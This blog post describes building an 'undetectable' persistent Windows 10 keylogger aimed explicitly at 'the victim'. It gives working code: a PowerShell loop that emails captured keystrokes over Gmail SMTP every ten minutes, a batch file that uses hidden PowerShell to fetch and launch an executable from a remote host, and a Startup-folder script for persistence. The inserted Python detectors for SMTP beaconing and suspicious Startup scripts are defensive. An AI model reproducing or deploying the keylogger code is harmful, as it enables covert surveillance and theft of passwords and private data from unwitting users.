Persistent Windows 10 keylogger (keylogiq)

In this post, I will describe how I created an undetectable keylogger for Windows 10. First, why did I decide to create my own tool when keyloggers already exist? Well, I could not find one that includes the additional functions I wanted, such as sending results over email every X minutes. More importantly, I could not find one with a persistence option, so that as soon as the computer is rebooted or turned on, the keylogger starts recording again. It was also important for me to create a tool with options for upgrading the attack by adding, e.g., a keygrabber, a backdoor, etc.

However, since this tool was created mostly for educational purposes and fun, I did not bother much about how accurately it records special characters. I found source code written in C and tested it. It worked fine, so I decided to go further and implement the other things. Maybe you are asking why I decided to use a keylogger written in C and not in, e.g., Python. Well, I think C is most suitable when we are talking about the file extension. Compiled C code gives you an .exe file, which Windows executes by default, while Python gives you a .py file, which needs Python preinstalled on the Windows machine in order to run. Of course, there are also ways to convert Python code into an exe file, but many times it does not work well, at least for me.

So far I have covered the keylogger itself. The next step was to implement sending results over email. I tried to implement this function in C inside the keylogger itself, but unfortunately I failed. That was enough frustration with C, so I decided to implement this function in a PowerShell script, which I needed anyway for setting up persistence. Here is the part of the PowerShell code that sends an email every 600 seconds with an attachment (Record.txt), the file where the keylogger records keystrokes. It repeats as long as the keylogger process is active.

cd $env:USERPROFILE"\AppData\Local\Temp"
$SMTPServer = "smtp.gmail.com"
$SMTPPort = "587"
$Username = "[email protected]"
$Password = "qwertz12345"

Do
{

$to = "[email protected]"
$subject = "key_records"
$body = "key records"
$attachment = "Record.txt"

$message = New-Object System.Net.Mail.MailMessage
$message.subject = $subject
$message.body = $body
$message.to.add($to)
$message.from = $username
$message.attachments.add($attachment)
$smtp = New-Object System.Net.Mail.SmtpClient($SMTPServer, $SMTPPort);
$smtp.EnableSSL = $true
$smtp.Credentials = New-Object System.Net.NetworkCredential($Username, $Password);
$smtp.send($message);

start-sleep 5

$message.Dispose() 

$proc = Get-Process

start-sleep 600

} While ($proc.name -contains 'keylogger') 
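From a detection point of view, the loop above has a very regular shape: a non-mail process (a hidden powershell.exe) opens a connection to an SMTP submission port every 600 seconds. The following is an added example, not code from this post or its tool, showing how a defender can spot that periodicity in host network telemetry. The log format, the process allowlist and the sample lines are all constructed for the example; real EDR or firewall schemas differ.

```python
"""Flag periodic SMTP beaconing from non-mail processes (constructed telemetry).

A mail client sending at irregular, human times is normal; a scripting host
contacting smtp.gmail.com:587 at a fixed interval is the shape of the
exfiltration loop described above. The "<ISO timestamp> <process> -> <host>:<port>"
format below is constructed for this example, not a product's real schema.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample log: one benign mail client plus a 600-second beacon.
SAMPLE_LOG = """\
2024-03-01T09:00:00 outlook.exe -> smtp.office365.com:587
2024-03-01T09:00:05 powershell.exe -> smtp.gmail.com:587
2024-03-01T09:10:05 powershell.exe -> smtp.gmail.com:587
2024-03-01T09:20:06 powershell.exe -> smtp.gmail.com:587
2024-03-01T09:30:05 powershell.exe -> smtp.gmail.com:587
2024-03-01T09:12:00 outlook.exe -> smtp.office365.com:587
2024-03-01T11:47:00 outlook.exe -> smtp.office365.com:587
2024-03-01T09:31:00 chrome.exe -> www.example.com:443
"""

# SMTP submission ports; anything else is ignored by this check.
MAIL_PORTS = {25, 465, 587}
# Processes expected to speak SMTP (assumed allowlist for the example).
KNOWN_MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}


def parse_log(text):
    """Parse the constructed log format into (timestamp, process, host, port) tuples."""
    events = []
    for line in text.splitlines():
        ts, proc, _, dest = line.split()
        host, port = dest.rsplit(":", 1)
        events.append((datetime.fromisoformat(ts), proc.lower(), host, int(port)))
    return events


def find_smtp_beacons(events, min_hits=3, max_jitter=0.10):
    """Return (process, host, median_interval_seconds) for regular SMTP beacons.

    A beacon is a non-mail process that reached the same mail host at least
    min_hits times with every inter-connection gap within max_jitter of the
    median gap. Sleep-based loops like the one above produce exactly that.
    """
    buckets = defaultdict(list)
    for ts, proc, host, port in events:
        if port in MAIL_PORTS and proc not in KNOWN_MAIL_CLIENTS:
            buckets[(proc, host)].append(ts)

    hits = []
    for (proc, host), stamps in buckets.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        m = median(gaps)
        # Regular interval: every gap lies within max_jitter of the median gap.
        if m > 0 and all(abs(g - m) / m <= max_jitter for g in gaps):
            hits.append((proc, host, m))
    return hits


if __name__ == "__main__":
    for proc, host, interval in find_smtp_beacons(parse_log(SAMPLE_LOG)):
        print(f"ALERT: {proc} -> {host} every ~{interval:.0f}s")
```

The check deliberately keys on interval regularity rather than on the destination: blocking smtp.gmail.com alone is easy to route around, whereas a scripting host making clockwork connections to any mail port is worth a look regardless of the provider. Tighten `max_jitter` or raise `min_hits` if benign automation on the host produces false positives.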

In addition, I created the main batch file, which does the following. It starts a PowerShell script in the background that downloads keylogger.exe, Record.txt, email_powershell.ps1 and persistent.bat into a specific folder and starts the processes. All files are stored in Users\(user name)\AppData\Local\Temp; only persistent.bat is stored in the folder for programs that auto-start at boot (Users\(user name)\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). Here is the code of main.bat:

@ECHO OFF
cd %userprofile%\AppData\Local\Temp
start PowerShell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.110/Record.txt','Record.txt');(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.110/smkscr.ps1','smkscr.ps1');(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.110/krec.exe','krec.exe');Start-Process 'krec.exe';.\smkscr.ps1; 
cd "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
start PowerShell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.110/pers.bat', 'pers.bat')

And here is the code of the persistent.bat file, which is nothing special. When it is executed, it runs the keylogger and the email PowerShell script again.

@ECHO OFF
cd %userprofile%\AppData\Local\Temp
start PowerShell -windowstyle hidden -ExecutionPolicy Bypass Start-Process 'krec.exe';.\smkscr.ps1
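Both main.bat and persistent.bat above are ordinary batch files whose only job is to start a hidden PowerShell that fetches and runs a binary from %TEMP%, and persistent.bat lives in the user's Startup folder. None of those traits is suspicious on its own, but several of them together in a Startup entry is a strong signal that a defender can score. The following is an added example, not code from this post or its generator tool: a small scanner for Startup-folder scripts that counts such indicators. The regexes, the threshold, the file names and the 198.51.100.7 address in the sample entries are constructed for the example.

```python
"""Score Startup-folder scripts for the hidden-PowerShell launcher pattern.

Input is a mapping of file name to script body, as a collector would read it
from the Startup folder. Each indicator is a regex over the script text; an
entry that trips several of them is reported. The indicators, threshold and
sample files are constructed for this example, not a product's detection rule.
"""
import re

# (indicator name, case-insensitive regex). Order determines report order.
INDICATORS = [
    # PowerShell launched with a hidden window (-w / -windowstyle hidden)
    ("hidden_powershell", r"powershell[^\r\n]*-w(?:indowstyle)?\s+hidden"),
    # Script-signing policy explicitly bypassed on the command line
    ("exec_policy_bypass", r"-(?:ex|ep|executionpolicy)\s+bypass"),
    # In-line download of a file with WebClient
    ("webclient_download", r"\.DownloadFile\s*\("),
    # Working directory switched into the user's Temp folder
    ("runs_from_temp", r"\\AppData\\Local\\Temp"),
    # An .exe started via Start-Process from a script
    ("starts_exe", r"Start-Process\s+'?[^'\s]+\.exe"),
    # Download source is a bare IP over plain HTTP
    ("plain_http_url", r"https?://\d{1,3}(?:\.\d{1,3}){3}/"),
]
# Number of matched indicators at which an entry is reported (assumed value).
ALERT_THRESHOLD = 3


def score_script(text):
    """Return the names of all indicators matched by one script body."""
    return [name for name, pat in INDICATORS if re.search(pat, text, re.IGNORECASE)]


def scan_startup(entries):
    """entries: {filename: contents}. Return {filename: matched indicators} for hits."""
    findings = {}
    for name, body in entries.items():
        matched = score_script(body)
        if len(matched) >= ALERT_THRESHOLD:
            findings[name] = matched
    return findings


# Constructed Startup folder contents: one benign launcher and two launcher
# scripts shaped like persistent.bat and main.bat above (host is a
# documentation-range placeholder address).
SAMPLE_STARTUP = {
    "OneNoteQuickLaunch.bat": "@ECHO OFF\r\nstart \"\" \"C:\\Program Files\\App\\app.exe\"\r\n",
    "pers.bat": (
        "@ECHO OFF\r\n"
        "cd %userprofile%\\AppData\\Local\\Temp\r\n"
        "start PowerShell -windowstyle hidden -ExecutionPolicy Bypass "
        "Start-Process 'krec.exe';.\\smkscr.ps1\r\n"
    ),
    "updater.bat": (
        "@ECHO OFF\r\n"
        "cd %userprofile%\\AppData\\Local\\Temp\r\n"
        "start PowerShell -windowstyle hidden (New-Object System.Net.WebClient)"
        ".DownloadFile('http://198.51.100.7/krec.exe','krec.exe');Start-Process 'krec.exe'\r\n"
    ),
}


if __name__ == "__main__":
    for fname, matched in scan_startup(SAMPLE_STARTUP).items():
        print(f"{fname}: {len(matched)} indicators -> {', '.join(matched)}")
```

Scoring rather than matching a single string keeps the rule useful against trivial renames: the file names and the download host in the post are incidental, while a Startup script that hides its PowerShell window, bypasses the execution policy and runs an executable out of Temp describes the technique itself. The same indicator list applies equally to PowerShell script-block logs (Event ID 4104) if those are collected instead of the files.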

That’s it; now I have a fully functional undetectable keylogger for Windows 10, which sends me results by email forever. Well, until it is detected by the user :). All I need is to transfer the files to my C2 server and make the victim run my main.bat file…

Finally, I created a tool/script for Linux that will create all the necessary files for you. All you need is to input a Gmail account, password, how often you want to receive results by email, and the hosting address for the needed files. And do not forget to enable access for less secure apps in your Gmail account, otherwise you will not receive mails. You can find this tool at the following link.
